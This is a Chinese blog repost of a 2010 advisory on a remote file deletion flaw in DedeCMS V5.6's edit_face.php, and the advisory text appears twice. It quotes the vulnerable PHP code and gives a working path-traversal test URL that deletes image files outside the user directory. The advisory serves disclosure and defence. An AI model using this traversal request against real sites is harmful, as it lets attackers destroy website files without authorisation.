上一篇
下一篇
织梦(Dedecms)V5.6远程文件删除漏洞
作者:admin 日期:2010-07-18
影响版本:DedeCmsV5.6
漏洞描述:
DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。
漏洞文件:edit_face.php
else if($dopost==''delold'') //45行
{
if(empty($oldface))
{
ShowMsg("没有可删除的头像!", "-1");
exit();
}
$userdir = $cfg_user_dir.''/''.$cfg_ml->M_ID;
if(!ereg(''^''.$userdir, $oldface))
{
$oldface = '''';
}
if(eregi("\.(jpg|gif|png)$", $oldface) && file_exists($cfg_basedir.$oldface))
{
@unlink($cfg_basedir.$oldface);
}
只判断oldface 前面是否在目录下,没包括过滤 ../
但有验证 \.(jpg|gif|png)$ ,所以只能删除 jpg , gif ,png 类型的文件
测试方法:
http://sitedir.com.cn/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
厂商补丁:
DedeCMS
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.dedecms.com/
文章转载自『非安全中国网』地址: http://www.sitedir.com.cn/exploit-1230.html
漏洞描述:
DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。
漏洞文件:edit_face.php
else if($dopost==''delold'') //45行
{
if(empty($oldface))
{
ShowMsg("没有可删除的头像!", "-1");
exit();
}
$userdir = $cfg_user_dir.''/''.$cfg_ml->M_ID;
if(!ereg(''^''.$userdir, $oldface))
{
$oldface = '''';
}
if(eregi("\.(jpg|gif|png)$", $oldface) && file_exists($cfg_basedir.$oldface))
{
@unlink($cfg_basedir.$oldface);
}
只判断oldface 前面是否在目录下,没包括过滤 ../
但有验证 \.(jpg|gif|png)$ ,所以只能删除 jpg , gif ,png 类型的文件
测试方法:
http://sitedir.com.cn/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
厂商补丁:
DedeCMS
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.dedecms.com/
文章转载自『非安全中国网』地址: http://www.sitedir.com.cn/exploit-1230.html
文章来自: 
引用通告: 
Tags: 评论: 0 | 引用: 0 | 查看次数: 33
发表评论
